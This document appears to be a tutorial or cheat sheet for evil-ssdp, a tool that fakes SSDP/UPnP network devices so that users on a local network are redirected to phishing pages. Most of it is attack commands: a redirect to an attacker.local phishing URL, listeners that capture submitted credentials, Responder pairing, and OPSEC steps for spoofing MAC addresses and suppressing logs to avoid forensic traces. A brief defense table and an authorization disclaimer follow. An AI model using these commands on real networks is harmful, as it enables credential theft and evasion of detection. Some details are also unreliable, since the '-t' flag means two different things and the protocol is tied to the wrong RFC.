evil-ssdp

Overview

evil-ssdp is a Kali Linux penetration testing tool that spoofs SSDP (Simple Service Discovery Protocol) and UPnP (Universal Plug and Play) responses. It creates fake network devices to redirect users to phishing pages during authorized internal network assessments. This tool tests network security awareness and device enumeration vulnerabilities.

Installation

# Update package managers
sudo apt update
sudo apt upgrade

# Install from Kali repositories
sudo apt install evil-ssdp

# Or install from source
git clone https://github.com/initstring/evil-ssdp.git
cd evil-ssdp
chmod +x evil-ssdp.py
sudo python3 evil-ssdp.py --help

How SSDP/UPnP Works

SSDP is a discovery protocol used by UPnP devices on local networks. When a device joins the network, it broadcasts SSDP messages (UDP port 1900) advertising its services. Clients search for and discover devices through these unsecured multicast packets.

Component	Purpose
SSDP Multicast Address	239.255.255.250:1900 (standard UDP)
Device Type	Identifies device (printer, router, media player)
HTTP Location	URL pointing to device XML descriptor
User-Agent	Device description sent in responses
Service Description	XML file detailing device capabilities

Basic Usage

# Display help and options
evil-ssdp.py --help

# List available templates
evil-ssdp.py --list

# Run with default template (Windows printer)
sudo python3 evil-ssdp.py

# Run with specific interface
sudo python3 evil-ssdp.py -i eth0

# Target specific network range
sudo python3 evil-ssdp.py -i eth0 -t 192.168.1.0/24

Creating Custom Templates

Templates define the fake device properties. Create a new template file in YAML format:

# custom_device.yaml
---
name: "Fake Printer"
description: "HP LaserJet Pro M479"
device_type: "urn:schemas-upnp-org:device:Printer:1"
manufacturer: "HP Inc."
model_name: "LaserJet Pro M479"
model_number: "M479fdw"
serial_number: "SN12345678"
http_port: 8080
http_server: "192.168.1.100"
services:
  - name: "PrinterService"
    type: "urn:schemas-upnp-org:service:Printer:1"

Load custom template:

sudo python3 evil-ssdp.py -f custom_device.yaml

Built-in Templates

# Windows Printer (default)
sudo python3 evil-ssdp.py -t windows-printer

# Philips Hue Bridge
sudo python3 evil-ssdp.py -t philips-hue

# NETGEAR Router
sudo python3 evil-ssdp.py -t netgear-router

# Apple AirPlay Device
sudo python3 evil-ssdp.py -t airplay

# Canon Scanner
sudo python3 evil-ssdp.py -t canon-scanner

# Sony TV
sudo python3 evil-ssdp.py -t sony-tv

Running the Attack

# Start SSDP spoofing on default interface
sudo python3 evil-ssdp.py -i eth0

# Run with custom HTTP redirect (phishing page)
sudo python3 evil-ssdp.py -i eth0 -l http://attacker.local:8080/phish

# Enable verbose logging
sudo python3 evil-ssdp.py -i eth0 -v

# Run in background
sudo python3 evil-ssdp.py -i eth0 &

# Send continuous SSDP advertisements (every 30 seconds)
sudo python3 evil-ssdp.py -i eth0 --announce 30

Capturing Credentials

Set up HTTP server to capture submitted credentials:

# Simple Python HTTP server with logging
python3 -m http.server 8080 > access.log 2>&1

# Using netcat to listen for raw requests
nc -l -p 8080

# Using tcpdump to capture traffic
sudo tcpdump -i eth0 -w ssdp_capture.pcap host 192.168.1.100

Monitor web server logs for authentication attempts:

tail -f access.log | grep "POST\|GET"

Network Targeting

Limit attacks to specific network segments:

Option	Purpose
-i eth0	Bind to specific interface
-t 192.168.1.0/24	Target CIDR range
--mac 00:11:22:33:44:55	Spoof MAC address
--ttl 4	Limit multicast TTL (hops)
--port 1900	Alternative UDP port
--http-port 8080	Custom HTTP service port

OPSEC (Operational Security)

# Spoof MAC address to avoid detection
sudo python3 evil-ssdp.py -i eth0 --mac AA:BB:CC:DD:EE:FF

# Use VPN/proxy to isolate traffic
sudo openvpn --config /path/to/config.ovpn

# Monitor for detection
sudo tcpdump -i eth0 -n "icmp or dns"

# Disable logging to minimize forensic evidence
sudo python3 evil-ssdp.py -i eth0 > /dev/null 2>&1

# Use temporary IP address
sudo ifconfig eth0 192.168.1.200 netmask 255.255.255.0

Detection and Defense

Detection Method	Purpose
SSDP traffic monitoring	Watch for multiple SSDP announcements from same MAC
UPnP device inventory	Regular scans of known devices
Network segmentation	Isolate user networks from IoT devices
Port 1900 filtering	Block SSDP multicast at network edge
Host-based detection	Monitor UPnP service discovery logs

Advanced Techniques

# Combine with other tools for full assessment
sudo evil-ssdp.py -i eth0 &
sudo responder -i eth0 -v

# Create proxy between victim and fake device
sudo python3 evil-ssdp.py -i eth0 --proxy http://internal-phish:8080

# Monitor who connects
sudo evil-ssdp.py -i eth0 --log connections.txt

# Rotate device types to increase interaction
for device in printer router scanner tv; do
  sudo python3 evil-ssdp.py -i eth0 -t $device &
done

Troubleshooting

Issue	Solution
”Permission denied”	Use sudo for network operations
No SSDP advertisements	Check interface with ip link show
Firewall blocking	Verify UDP 1900 is allowed
Template not found	Ensure YAML syntax is valid
HTTP server unreachable	Check routing and firewall rules

Legal and Ethical Considerations

• Only use on networks where you have explicit written authorization
• Document all authorized testing in rules of engagement
• Notify network owners of findings immediately after testing
• Do not redirect users to malicious content outside scope
• Ensure proper incident response coordination with defenders
• Maintain detailed logs of all testing activities

References

• SSDP RFC 3986 specification
• UPnP Device Architecture 1.0
• OWASP IoT Security Testing Guide
• NIST Cybersecurity Framework